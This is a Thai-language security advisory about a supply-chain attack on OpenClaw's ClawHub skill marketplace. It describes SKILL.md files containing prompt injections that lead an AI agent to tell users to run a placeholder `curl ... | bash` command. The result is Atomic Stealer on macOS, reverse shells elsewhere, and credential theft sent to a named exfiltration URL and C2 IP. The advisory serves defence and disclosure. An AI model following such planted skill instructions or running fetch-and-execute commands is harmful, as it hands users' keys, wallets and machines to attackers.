ข่าวนี้เปิดเผยถึงช่องโหว่ร้ายแรงในห่วงโซ่อุปทานของแพลตฟอร์ม AI agent แบบโอเพนซอร์สชื่อ OpenClaw โดยพบว่าทักษะ (skill) ที่มีการดาวน์โหลดมากที่สุดบนตลาด ClawHub เป็นมัลแวร์ที่ทำงานได้จริง ไม่ใช่เครื่องมือเพิ่มประสิทธิภาพการทำงานอย่างที่อ้าง ผู้เชี่ยวชาญด้านความปลอดภัยได้ระบุทักษะที่เป็นอันตราย 1,184 รายการ ซึ่งผู้โจมตีเพียงรายเดียวรับผิดชอบการอัปโหลดถึง 677 แพ็คเกจ การโจมตีนี้ใช้ประโยชน์จากการตรวจสอบยืนยันที่หละหลวม ทำให้ผู้โจมตีสามารถแพร่กระจายมัลแวร์ที่ปลอมตัวเป็นเครื่องมือทั่วไป แต่กลับขโมยข้อมูลสำคัญ เช่น SSH Keys, รหัสผ่านเบราว์เซอร์, กระเป๋าเงินคริปโต และ API Keys รวมถึงเปิด Reverse Shells เพื่อควบคุมเครื่องของเหยื่อ การโจมตีดังกล่าวชี้ให้เห็นถึงความท้าทายด้านความปลอดภัยที่ไม่เหมือนใครในยุค AI ซึ่งมัลแวร์สามารถซ่อนตัวในคำสั่งภาษาธรรมชาติและหลีกเลี่ยงเครื่องมือตรวจจับแบบดั้งเดิมได้
Severity: วิกฤต
System Impact:
- OpenClaw’s ClawHub marketplace (ช่องโหว่ในห่วงโซ่อุปทาน)
- ระบบนิเวศ AI agent
- ระบบปฏิบัติการ macOS (ถูกติดตั้ง Atomic Stealer)
- ระบบปฏิบัติการอื่นๆ (ถูกเปิด Reverse Shells)
- ข้อมูลผู้ใช้ (รหัสผ่านเบราว์เซอร์, SSH keys, เซสชัน Telegram, คีย์กระเป๋าเงินคริปโต, ข้อมูล keychain, API keys ที่เก็บในไฟล์ .env)
- สภาพแวดล้อมองค์กร (ความเสี่ยง ‘Shadow AI’ และการข้ามการตรวจสอบจากระบบพร็อกซี่แบบเดิม)
Technical Attack Steps:
- ผู้โจมตีอัปโหลด ‘ทักษะ’ (skills) ที่เป็นอันตรายไปยังตลาด ClawHub ของ OpenClaw โดยใช้ประโยชน์จากข้อกำหนดการยืนยันที่หละหลวม (เช่น บัญชี GitHub อายุ 1 สัปดาห์)
- ทักษะที่เป็นอันตรายเหล่านี้ปลอมแปลงเป็นเครื่องมือเพิ่มประสิทธิภาพการทำงานทั่วไป เช่น บอทซื้อขายคริปโต, เครื่องมือสรุป YouTube, เครื่องมือติดตามกระเป๋าเงิน พร้อมเอกสารประกอบที่ดูน่าเชื่อถือ
- ไฟล์ `SKILL.md` ที่ซ่อนอยู่ภายในทักษะเหล่านี้มีคำสั่ง AI prompt ที่ออกแบบมาเพื่อหลอกให้ AI agent แนะนำผู้ใช้ให้รันคำสั่งอันตราย เช่น `curl -sL malware_link | bash`
- เมื่อผู้ใช้รันคำสั่งดังกล่าว: บน macOS จะมีการติดตั้ง Atomic Stealer (AMOS) เพื่อขโมยรหัสผ่านเบราว์เซอร์, SSH keys, เซสชัน Telegram, คีย์กระเป๋าเงินคริปโต, ข้อมูล keychain และ API keys ที่อยู่ในไฟล์ `.env`
- บนระบบปฏิบัติการอื่นๆ มัลแวร์จะเปิด Reverse Shell เพื่อให้ผู้โจมตีสามารถควบคุมเครื่องของเหยื่อจากระยะไกลได้
- มัลแวร์แอบส่งข้อมูลผู้ใช้ไปยังเซิร์ฟเวอร์ที่ผู้โจมตีควบคุม (`https://clawbub-skill.com/log`) โดยเปลี่ยนเส้นทางเอาต์พุตไปยัง `/dev/null` เพื่อหลีกเลี่ยงการตรวจจับ
- มีการใช้ Prompt Injection Payloads เพื่อหลีกเลี่ยงแนวทางความปลอดภัยของ Claude
- เซิร์ฟเวอร์ Command-and-Control (C2) ทั่วไปที่ใช้ในการโจมตีคือ `91.92.242.30`
Recommendations:
Short Term:
- OpenClaw ได้เริ่มใช้ Google VirusTotal เพื่อสแกนทักษะที่อัปโหลดทั้งหมดแล้ว (แบ่งเป็นไม่เป็นอันตราย, น่าสงสัย, เป็นอันตราย) พร้อมสแกนซ้ำทุกวันเพื่อตรวจจับมัลแวร์ที่อาจเปลี่ยนแปลงหลังการอนุมัติ
- ผู้ใช้ควรรีบตรวจสอบและลบ ‘ทักษะ’ ใดๆ ที่ดาวน์โหลดจาก ClawHub ทันที โดยเฉพาะอย่างยิ่งจากผู้เผยแพร่ที่ไม่รู้จักหรือไม่น่าไว้วางใจ
- เปลี่ยนข้อมูลรับรองสำหรับบัญชีทั้งหมดที่อาจมีการจัดเก็บ SSH keys, กระเป๋าเงินคริปโต, ข้อมูลเบราว์เซอร์ หรือ API keys หากเคยใช้ AI agent ของ OpenClaw กับทักษะดังกล่าว
- ดำเนินการตรวจสอบความปลอดภัยในสภาพแวดล้อม AI agent
- ตรวจสอบการเชื่อมต่อเครือข่ายไปยัง IP ที่น่าสงสัย (เช่น `91.92.242.30`)
Long Term:
- OpenClaw และแพลตฟอร์มที่คล้ายกันต้องนำกระบวนการตรวจสอบยืนยันนักพัฒนาที่เข้มงวดมากขึ้นมาใช้สำหรับการเผยแพร่ทักษะ
- พัฒนาและนำเครื่องมือรักษาความปลอดภัยที่เน้น AI โดยเฉพาะมาใช้ ซึ่งสามารถตรวจจับเจตนาที่เป็นอันตรายที่เข้ารหัสในคำสั่งภาษาธรรมชาติ ไม่ใช่แค่ไฟล์ไบนารี
- องค์กรควรสร้างนโยบาย ‘AI Governance’ ที่เข้มงวดเพื่อจัดการความเสี่ยง ‘Shadow AI’ เพื่อให้แน่ใจว่า AI agent ทั้งหมดทำงานในสภาพแวดล้อมที่ควบคุมได้ พร้อมเส้นทางการตรวจสอบและการตรวจสอบที่เหมาะสม
- ผสานรวมแพลตฟอร์ม AI agent เข้ากับระบบ EDR (Endpoint Detection and Response) และ SIEM (Security Information and Event Management) ที่มีอยู่ เพื่อให้แน่ใจว่ามีการบันทึกและตรวจจับภัยคุกคามที่ครอบคลุม
- ตรวจสอบทักษะ AI agent ของบุคคลที่สามอย่างสม่ำเสมอก่อนนำไปใช้งานจริง
- ให้ความรู้แก่ผู้ใช้เกี่ยวกับความเสี่ยงที่เกี่ยวข้องกับการดาวน์โหลดและติดตั้งทักษะ AI agent จากตลาดสาธารณะ
Source: https://cybersecuritynews.com/openclaws-top-skill-malware/
Share this content: